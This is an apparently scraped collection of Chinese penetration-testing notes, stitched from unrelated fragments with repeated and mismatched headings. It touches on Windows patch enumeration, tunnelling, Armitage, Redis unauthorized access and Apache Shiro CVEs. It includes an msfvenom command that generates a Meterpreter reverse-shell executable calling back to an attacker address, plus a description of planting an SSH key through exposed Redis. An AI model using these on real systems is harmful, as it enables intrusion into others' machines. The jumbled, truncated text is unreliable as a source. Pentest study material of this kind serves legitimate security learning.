0x00.简述

0x00.简述

0x01.漏洞发现

1.WMIC发现安装补丁

1

wmic qfe get Caption,Description,HotFixID,InstalledOn

2.msf发现安装补丁

首先使用msfvenom生成恶意程序

1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 -f exe > shell.exe

0x01.基础知识

完成内网信息搜集后，需要先判断流量是否出得去、进得来。隐藏通信隧道技术常用于在访问受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的数据传输。

1.概述

​ 在渗透场景中，各种安全设备会检查对外连接的情况，如果发现异常，就会对通信进行阻断。因此建立专门的隐蔽隧道就十分必要，这能绕过端口屏蔽。
常用的隧道如下：

1
2
3

网络层隧道：IPv6、ICMP、GRE
传输层隧道：TCP、UDP、常规端口转发
应用层隧道：SSH、HTTP、HTTPS、DNS

Armitage

0x01.什么是Armitage

Armitage 是一个用于Metasploit的可编写脚本的 红队协作工具，可将目标可视化、推荐漏洞利用并公开框架中的高级后漏洞利用功能。

通过一个 Metasploit 实例，您的团队将：

• 使用相同的会话
• 共享主机、捕获的数据和下载的文件
• 通过共享事件日志进行通信。
• 运行机器人以自动执行红队任务。

Armitage 是红队行动的力量倍增器。

Cobalt Strike是用于对手模拟和红队行动的工具集。截至 2015 年 10 月，Cobalt Strike 不与 Armitage 共享代码，也不依赖于 Metasploit 框架。您可以使用 Armitage 通过 Metasploit 漏洞利用来触发 Cobalt Strike 的 Beacon 有效载荷。您还可以通过 Cobalt Strike Beacon 隧道传输 Metasploit 攻击。

Redis未授权访问漏洞

一、漏洞简介

Redis默认情况下，会绑定在0.0.0.0:6379(在redis3.2之后，redis增加了protected-mode，在这个模式下，非绑定IP或者没有配置密码访问时都会报错)，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源ip访问等等，这样将会将Redis服务暴露在公网上，如果在没有设置密码认证(默认为空)的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下，利用Redis自身的提供的config命令，可以进行写文件操作，攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中，进而可以使用对应私钥直接使用ssh服务器登录目标服务器。

漏洞的产生条件有以下两点:

(1) Redis绑定在0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略，直接暴露在公网

(2) 没有设置密码认证（默认为空）或者弱密码，可以免密码登录redis服务

0x01.工作组信息收集

01.检测当前shell权限

1
2
3

whoami /user    #查看当前用户的SID
whoami /priv    #查看当前用户的安全权限
whoami /all

02.查看当前系统信息

1

systeminfo

03.tcp/udp 网络连接状态

1

netstat -nao

0x00.简述

（CVE-2020-1957）Apache Shiro 身份认证绕过漏洞

0x01.漏洞简述

Apache Shiro 1.5.2之前版本中存在安全漏洞。攻击者可借助特制的请求利用该漏洞绕过身份验证。

（CVE-2016-4437）Apache Shiro 反序列化漏洞

0x01.漏洞简述

Apache shiro默认使用了CookieRememberMeManager，其处理cookie的流程是：得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。
然而AES的密钥是硬编码的，就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。